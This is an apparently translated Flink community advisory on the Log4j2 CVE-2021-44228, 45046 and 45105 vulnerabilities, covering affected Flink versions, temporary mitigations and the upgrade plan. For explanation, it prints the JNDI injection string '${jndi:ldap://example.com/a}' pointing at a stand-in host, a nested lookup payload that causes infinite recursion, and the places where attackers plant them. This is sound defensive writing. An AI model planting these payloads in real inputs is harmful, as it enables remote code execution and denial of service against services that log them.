
In this article, Yu Hangxiang and Li Yu describe the impact of the Log4j2 zero-day vulnerability and the Flink community's response plan. The main contents include:

  1. Vulnerability description
  2. Flink users may be affected
  3. Affected Flink versions and temporary solutions
  4. Flink community repair plan

Overview

Apache Log4j is a Java-based logging tool. Apache Log4j2 is a rewrite of Log4j that adds many features. Recently, Alibaba Cloud Security reported a zero-day vulnerability in Apache Log4j2 [1]. By exploiting it, attackers can construct malicious requests that trigger remote code execution. The vulnerability is tracked as CVE-2021-44228 [2]. After the problem was discovered, the Log4j team immediately released version 2.15.0 and provided a temporary mitigation.

On December 14, a team from Twitter discovered and reported a new vulnerability, CVE-2021-45046 [17]. It shows that the fix for CVE-2021-44228 in 2.15.0 and the temporary mitigation provided with it are incomplete: under certain configurations they can still be exploited to cause denial-of-service (DoS) attacks. The Log4j team subsequently released version 2.16.0, recommended that affected software upgrade to it, and published a new temporary mitigation.

These two vulnerabilities affect 2.0-beta9 <= log4j2 <= 2.12.1 and 2.13.0 <= log4j2 <= 2.15.0. Apache Flink 1.10 and earlier use Log4j 1.x and can be considered unaffected. Flink 1.11 and later use Log4j 2.x, and all of them fall within the affected range.

On December 16, a new issue related to Apache Log4j was raised [18]. After verification, CVE-2021-45105 [19] was published on December 18. It shows that version 2.16.0 and the temporary mitigation for CVE-2021-45046 still leave a risk of DoS attacks under certain configurations. The Log4j team then immediately released version 2.17.0 and published a new temporary mitigation.

The affected versions of the above vulnerabilities range from 2.0-beta9 to 2.16.0.
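
As a rough illustration of the range just quoted, the following Python sketch checks whether a Log4j version string lies between 2.0 and 2.16.0. The function names are hypothetical, and the parsing is a simplification: qualifiers such as "-beta9" are dropped, and backported fix releases are not considered.

```python
def parse_version(version: str) -> tuple:
    """Turn '2.14.1' or '2.0-beta9' into a comparable tuple of three ints.

    Qualifiers such as '-beta9' are ignored, which is a simplification.
    """
    numeric = version.split("-", 1)[0]
    parts = [int(p) for p in numeric.split(".")]
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts[:3])


def in_affected_range(log4j_version: str) -> bool:
    """True if the version lies in 2.0 .. 2.16.0, the range quoted in the text."""
    return (2, 0, 0) <= parse_version(log4j_version) <= (2, 16, 0)


for v in ["1.2.17", "2.12.1", "2.15.0", "2.16.0", "2.17.0"]:
    print(v, in_affected_range(v))
```

A check like this is only a first filter; the authoritative list of affected and fixed versions is the one published by the Log4j team.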

Below, we first briefly explain the details and impact of the vulnerabilities, then describe how they may affect Flink users, and finally present the temporary mitigations that Flink users can adopt and the Flink community's repair plan.

1. Vulnerability description

CVE-2021-44228

This vulnerability can be traced back to a feature that Log4j introduced years ago. In 2013, Log4j added the "JNDILookup plugin" [4] in version 2.0-beta9 [3].

Java introduced JNDI as a directory service interface in the late 1990s, allowing Java programs to look up data in a directory in the form of Java objects. JNDI provides a variety of SPIs to support different directory services, such as CORBA COS (Common Object Services), the Java RMI (Remote Method Invocation) Registry and LDAP (Lightweight Directory Access Protocol). All of these services may be exploited through CVE-2021-44228/45046.
Java programs can combine JNDI and LDAP to find Java objects containing data they need. For example, the standard Java documentation includes an example that communicates with an LDAP server to retrieve object attributes: it uses the URL "ldap://localhost:389/o=JNDITutorial" to find the JNDITutorial object on an LDAP server running on the same machine (localhost) on port 389, and then reads attributes from it.
As the official JNDI documentation puts it, "If your LDAP server is located on another machine or is using another port, then you need to edit the LDAP URL". The LDAP server can therefore run on a different machine, potentially anywhere on the Internet. This flexibility means that if an attacker can control the LDAP URL, they can make the Java program load an object from a server they control.
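
To make the parts of such a URL concrete, here is a small Python sketch that splits an LDAP URL into host, port and name using the standard library. The helper name is hypothetical, and the code only parses the string; it does not contact any server.

```python
from urllib.parse import urlparse


def describe_ldap_url(url: str) -> dict:
    """Split an LDAP URL into the pieces that decide which server is contacted."""
    parsed = urlparse(url)
    return {
        "scheme": parsed.scheme,
        "host": parsed.hostname,            # the machine that will be queried
        "port": parsed.port,                # None when the URL omits the port
        "name": parsed.path.lstrip("/"),    # the entry looked up on that server
    }


# The tutorial URL points at the local machine ...
print(describe_ldap_url("ldap://localhost:389/o=JNDITutorial"))
# ... but nothing in the URL format prevents pointing at any other host.
print(describe_ldap_url("ldap://example.com/a"))
```

Whoever chooses the URL chooses the host, which is why control over this string matters so much.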

In vulnerable versions of Log4j, an attacker can control the LDAP URL that Log4j accesses by passing in a string such as "${jndi:ldap://example.com/a}". In this case, Log4j connects to the LDAP server on example.com and retrieves the object.

Log4j gives special meaning to strings of the form "${prefix:name}". The prefix names one of the Lookups [5] provided by Log4j, and the name is the key to be resolved by that Lookup. For example, ${java:version} resolves to the version of the currently running Java runtime.
The JndiLookup added by LOG4J2-313 [4] provides the ability to retrieve variables through JNDI. By default, the key is prefixed with "java:comp/env/". However, when the key itself contains an additional ":", this default prefix is not applied. For example, when the string "${jndi:ldap://example.com/a}" is passed in, Log4j does not add the prefix, and because of the Message Lookup mechanism it queries the LDAP server for the target object.
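
The "${prefix:name}" form can be illustrated with a toy parser. This Python sketch is not Log4j's implementation (which also handles nesting and default values); the regular expression and function name are assumptions for the example.

```python
import re

# Matches one non-nested expression: "${" prefix ":" name "}".
LOOKUP = re.compile(r"\$\{([^:}]+):([^}]*)\}")


def split_lookup(expression: str):
    """Return (prefix, name) for a '${prefix:name}' string, or None if it is not one."""
    match = LOOKUP.fullmatch(expression)
    if match is None:
        return None
    return match.group(1), match.group(2)


print(split_lookup("${java:version}"))
print(split_lookup("${jndi:ldap://example.com/a}"))
print(split_lookup("plain text"))
```

Only the first ":" separates prefix from name, so everything after "jndi:" (including the further colons of the LDAP URL) is handed to the JNDI lookup as its key.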

Therefore, the attacker only needs to find an input that is likely to be logged and add a string such as "${jndi:ldap://example.com/a}" to it. For example, the attacker may insert the attack string into an HTTP header such as User-Agent, or into a form parameter such as username.

Logging such inputs is very common in Internet-facing Java applications. Worse, the string may be passed from one system to another, so that Java applications that are not Internet-facing can also be compromised.

For example, a User-Agent string that exploits the vulnerability can be passed to a back-end system written in Java. That system may build indexes or run data analysis on the malicious data, and if Log4j logs the data during this processing, the impact can be serious. All Java-based software that uses Log4j2 should therefore be patched immediately; otherwise the potential threat is great. Even if the Internet-facing software is not written in Java, malicious strings may be passed on to other systems that are, and cause serious problems there. Consider a billing system written in Java that logs a customer's name when it cannot find the customer. An attacker can create an order whose customer name contains the attack string. The string is then likely to travel through the web server and the database system and finally reach the billing system, and every system along that path may be affected.

Java is also used in many scenarios beyond Internet-facing systems, for example a parcel-handling system that scans QR codes, or a contactless door that reads electronic keys. If such systems are written in Java and use Log4j, they may be attacked as well. A carefully crafted QR code may encode a postal address containing the attack string, and a carefully encoded electronic key may carry a payload that exploits the vulnerability to track our entry and exit records.

Some systems also run scheduled tasks that do not process the malicious data immediately. The attack string may lie dormant until a scheduled task summarizes or archives the data and logs the string, so the vulnerability may be triggered, with serious impact, hours or even days later.

CVE-2021-45046

This vulnerability was discovered by Twitter. The fix for CVE-2021-44228 in version 2.15.0 and the earlier recommendations from the Log4j team cannot completely prevent exploitation. The reason is that when certain non-default Pattern Layouts (a Context Lookup or a Thread Context Map pattern) are used in the logging configuration, attackers can use them to inject malicious data.

If such a Pattern Layout exists in the logging configuration, the mitigation based on "log4j2.formatMsgNoLookups=true" cannot prevent malicious data from using JndiLookup to trigger CVE-2021-44228. Even though 2.15.0 restricts JNDI LDAP lookups to localhost, there is still a risk of DoS attacks.

CVE-2021-45105

This vulnerability shows that Log4j 2.16.0, even with the fix and temporary mitigation for CVE-2021-45046, is still at risk of DoS attacks. The reason is that when a non-default Pattern Layout containing a Context Lookup (such as $${ctx:loginId}) is used in the logging configuration, an attacker can put malicious data (such as ${${::-${::-$${::-j}}}}) into the Thread Context Map to trigger infinite recursion in Lookup evaluation, which ends in a StackOverflowError that terminates the process.

If such a Pattern Layout exists in the logging configuration, the mitigations based on "log4j2.formatMsgNoLookups=true" and on removing JndiLookup.class cannot prevent malicious data from triggering CVE-2021-45105, because the root cause lies in the String Substitution process.
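
The general failure mode, a substitution that keeps re-evaluating its own output, can be shown with a toy model. The Python sketch below is not Log4j's substitution algorithm and does not use the real payload; it assumes a simplified "${ctx:key}" syntax and a context value that refers to itself, with Python's RecursionError standing in for Java's StackOverflowError.

```python
import re

CTX_LOOKUP = re.compile(r"\$\{ctx:([^}]+)\}")


def substitute(text: str, context: dict) -> str:
    """Resolve ${ctx:key} lookups, re-evaluating each value without any cycle check."""
    match = CTX_LOOKUP.search(text)
    if match is None:
        return text
    # The looked-up value is itself evaluated again: this is the risky step.
    value = substitute(context.get(match.group(1), ""), context)
    rest = substitute(text[match.end():], context)
    return text[:match.start()] + value + rest


# A harmless value is substituted once and evaluation stops.
print(substitute("user=${ctx:loginId}", {"loginId": "alice"}))

# A value that refers back to the same lookup never stops resolving.
try:
    substitute("user=${ctx:loginId}", {"loginId": "${ctx:loginId}"})
except RecursionError:
    print("lookup evaluation did not terminate")
```

Neither disabling message lookups nor removing JndiLookup.class touches this step, which matches the point that the root cause sits in string substitution itself.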

2. Flink users may be affected

Flink 1.11 and later versions are affected by this vulnerability. As described in the previous section, although Flink is not directly exposed to the Internet in most deployments, an attack string may reach Flink from other systems (even if those systems have taken some precautions). Any operation that logs Record contents along the way then triggers the vulnerability, and such logging is very common in practice, so the impact can be serious.


Take a common log analysis scenario as an example. UDFs often log information about the Records they process. When an attack string (such as ${jndi:ldap://example.com/a}) is passed from Kafka to Flink and processed by such a UDF, the nodes in the job's execution environment are directly affected. On the one hand, this kind of delivery is not hindered by message encryption, because the UDF decrypts an encrypted message before processing it. On the other hand, it does not require permission to submit Flink jobs, since the string can be injected upstream. The vulnerability therefore poses a high threat to Flink systems, especially to execution environments that can reach external networks and lack secure container isolation.
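
To see how ordinary-looking records can carry such a string, the following Python sketch flags records that contain lookup syntax. It is an illustration for auditing only, not a mitigation: the function name and sample records are hypothetical, and the check is deliberately broad (any "${" counts) because narrower filters are easy to evade with nested lookups.

```python
import re

# Any "${" is treated as suspicious; this is intentionally broad.
LOOKUP_START = re.compile(r"\$\{")


def contains_lookup_syntax(record: str) -> bool:
    """True if the record contains the start of a '${...}' expression."""
    return LOOKUP_START.search(record) is not None


# Hypothetical records as they might arrive from an upstream topic.
records = [
    "GET /index.html Mozilla/5.0",
    "GET /login ${jndi:ldap://example.com/a}",
]
flagged = [r for r in records if contains_lookup_syntax(r)]
print(flagged)
```

Flagging of this kind can help locate where attack strings enter a pipeline, but only the configuration changes and upgrades described in the next section remove the vulnerability.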

3. Affected Flink versions and temporary solutions

The current log4j version details used by each released version of Flink are as follows:

[Table image not preserved: Log4j version used by each released Flink version]

As shown, Flink 1.11 and later use Log4j 2.x and are therefore all affected, while Flink 1.10 and earlier can be considered unaffected. The community is actively working on fixes, and the detailed repair plan is described in the next section.

Until the community releases the corresponding fixed versions, the problem has to be mitigated by following the latest recommendations from the Log4j team.

Once the community has released the fixed versions based on Log4j 2.17.0, users can upgrade directly to the latest version and then stop and restart their jobs to avoid these vulnerabilities.

If the Flink version used by the current job is one that ships Log4j 2.16.0 (i.e. 1.14.2, 1.13.5, 1.12.7 or 1.11.6), there are two options:

  1. In the PatternLayout of the logging configuration, replace Context Lookups such as ${ctx:loginId} or $${ctx:loginId} with Thread Context Map patterns (such as %X, %mdc, or %MDC).
  2. Remove ${ctx:loginId} or $${ctx:loginId} from the logging configuration entirely (the core problem is that malicious data can be injected through such lookups and then evaluated by Log4j).
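
The first option amounts to a textual change in the layout pattern. The Python sketch below shows that rewrite on a sample pattern string; the function name and the sample pattern are assumptions, and a real configuration should be reviewed by hand rather than rewritten blindly.

```python
import re

# Matches ${ctx:key} as well as the escaped form $${ctx:key}.
CTX_LOOKUP = re.compile(r"\${1,2}\{ctx:([^}]+)\}")


def to_thread_context_pattern(pattern: str) -> str:
    """Replace Context Lookups in a layout pattern with the %X{key} converter."""
    return CTX_LOOKUP.sub(lambda m: "%X{" + m.group(1) + "}", pattern)


before = "%d %p $${ctx:loginId} %m%n"
print(to_thread_context_pattern(before))
```

With %X{loginId}, the value from the Thread Context Map is written out as plain text instead of being passed through lookup evaluation.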

If the Flink version used by the current job ships Log4j 2.15.0 or earlier (i.e. 1.14.1, 1.13.4, 1.12.6, 1.11.5 and earlier versions), then in addition to the above, you also need to run:

 zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

This deletes JndiLookup.class from the log4j-core JAR that Flink depends on, which has the same effect as the disabling of JNDI in 2.16.0.
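
After running the command, it can be useful to verify that the class is really gone. The following Python sketch checks a JAR for the entry with the standard zipfile module; the helper name is hypothetical, and the demonstration builds a stand-in archive in a temporary directory instead of touching a real log4j-core JAR.

```python
import os
import tempfile
import zipfile

JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"


def contains_jndi_lookup(jar_path: str) -> bool:
    """True if the JAR (a zip archive) still contains JndiLookup.class."""
    with zipfile.ZipFile(jar_path) as jar:
        return JNDI_LOOKUP in jar.namelist()


# Demonstration on a stand-in archive; point the function at the real JAR in practice.
with tempfile.TemporaryDirectory() as tmp:
    demo_jar = os.path.join(tmp, "log4j-core-demo.jar")
    with zipfile.ZipFile(demo_jar, "w") as jar:
        jar.writestr(JNDI_LOOKUP, b"")
    print(contains_jndi_lookup(demo_jar))
```

The check needs to be repeated for every copy of log4j-core that the running job can load.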

Note the following three points:

  1. The job must be stopped before the fix is applied and restarted after the fix is complete.
  2. Although other temporary mitigations for the Apache Log4j zero-day problem were suggested earlier [6] [7], currently only the methods above completely avoid the impact of these vulnerabilities.
  3. Once fixed versions are released by the community, it is recommended to upgrade all jobs to the corresponding version as soon as possible.
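
The decision logic of this section can be summarized in a short Python sketch. It only knows the releases named in this article, the function and constant names are hypothetical, and it does not cover releases based on Log4j 2.17.0, which had not been published at the time of writing.

```python
# Flink releases that ship Log4j 2.16.0, as listed in this article.
LOG4J_2_16_RELEASES = {"1.14.2", "1.13.5", "1.12.7", "1.11.6"}


def temporary_steps(flink_version: str) -> list:
    """Return the temporary mitigation steps described above for a Flink version."""
    major, minor = (int(part) for part in flink_version.split(".")[:2])
    if (major, minor) <= (1, 10):
        return []  # Log4j 1.x: considered unaffected
    steps = ["replace or remove ${ctx:...} lookups in the PatternLayout"]
    if flink_version not in LOG4J_2_16_RELEASES:
        # Log4j 2.15.0 or earlier: JNDI must also be disabled by hand.
        steps.append("delete JndiLookup.class from the log4j-core JAR")
    return steps


for version in ["1.10.3", "1.13.2", "1.14.1", "1.14.2"]:
    print(version, temporary_steps(version))
```

In every case the job has to be stopped before the change and restarted afterwards, as noted in the first point above.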

4. Flink community repair plan

At present, Log4j has released 2.15.0, 2.16.0 and 2.17.0 versions. The specific fixes are as follows:

[Table image not preserved: fixes included in Log4j 2.15.0, 2.16.0 and 2.17.0]

After learning about this vulnerability, the Flink community immediately discussed a repair plan [14]. The community first upgraded Log4j in the master branch to 2.15.0 and at the same time backported the fix to 1.14.1, 1.13.4, 1.12.6 and 1.11.5 [12]. These versions have been published and can be used directly, for example:
https://search.maven.org/artifact/org.apache.flink/flink-core/1.14.1/jar

However, because Log4j 2.16.0 addresses the problem more thoroughly, the community then upgraded Log4j in the master branch to 2.16.0 and backported the fix to 1.14.2, 1.13.5, 1.12.7 and 1.11.6 [13]. Voting on these new versions has been completed, and they are expected to be published soon [14] [15] [16].

Plans for the fixed versions based on Log4j 2.17.0 are currently under discussion [20] [21]. Once the Flink community has released them, users only need to upgrade the Flink version used by their jobs to avoid this problem completely.

Reference

[1] Apache Log4j Vulnerability Details and Mitigation

https://www.cyberkendra.com/2021/12/apache-log4j-vulnerability-details-and.html

[2] CVE-2021-44228

https://nvd.nist.gov/vuln/detail/CVE-2021-44228

[3] Apache Log4j 2.0-beta9 released

https://blogs.apache.org/logging/entry/apache_log4j_2_0_beta9

[4] LOG4J2-313

https://issues.apache.org/jira/browse/LOG4J2-313

[5] LOG4J Lookups

https://logging.apache.org/log4j/2.x/manual/lookups.html

[6] Advise on Apache Log4j Zero Day (CVE-2021-44228)

https://flink.apache.org/2021/12/10/log4j-cve.html

[7] CVE-2021-44228 Solution

https://stackoverflow.com/questions/70315727/where-to-put-formatmsgnolookups-in-log4j-xml-config-file/70315902#70315902

[8] LOG4J2-3198

https://issues.apache.org/jira/browse/LOG4J2-3198

[9] LOG4J2-3201

https://issues.apache.org/jira/browse/LOG4J2-3201

[10] LOG4J2-3208

https://issues.apache.org/jira/browse/LOG4J2-3208

[11] LOG4J2-3211

https://issues.apache.org/jira/browse/LOG4J2-3211

[12] Update log4j2 version to 2.15.0

https://issues.apache.org/jira/browse/FLINK-25240

[13] Update Log4j to 2.16.0

https://issues.apache.org/jira/browse/FLINK-25295

[14] [DISCUSS] Immediate dedicated Flink releases for log4j vulnerability

https://lists.apache.org/thread/j15t1lwp84ph7ftjdhpw4429zgl13588

[15] [VOTE] Release 1.11.5/1.12.6/1.13.4/1.14.1, release candidate #1

https://lists.apache.org/thread/64tn3d38ko4hqc9blxdhqrh27x3fjro8

[16] [VOTE] Release 1.11.6/1.12.7/1.13.5/1.14.2, release candidate #1

https://lists.apache.org/thread/3yn7ps0ogdkr1r5zdjp10zftwcpr1hqn

[17] CVE-2021-45046

https://nvd.nist.gov/vuln/detail/CVE-2021-45046

[18] LOG4J2-3230

https://issues.apache.org/jira/browse/LOG4J2-3230

[19] CVE-2021-45105

https://nvd.nist.gov/vuln/detail/CVE-2021-45105

[20] CVE-2021-45105: Apache Log4j2 does not always protect from infinite recursion in lookup evaluation

https://lists.apache.org/thread/6gxlmk0zo9qktz1dksmnq6j0fttfqgno

[21] FLINK-25375

https://issues.apache.org/jira/browse/FLINK-25375

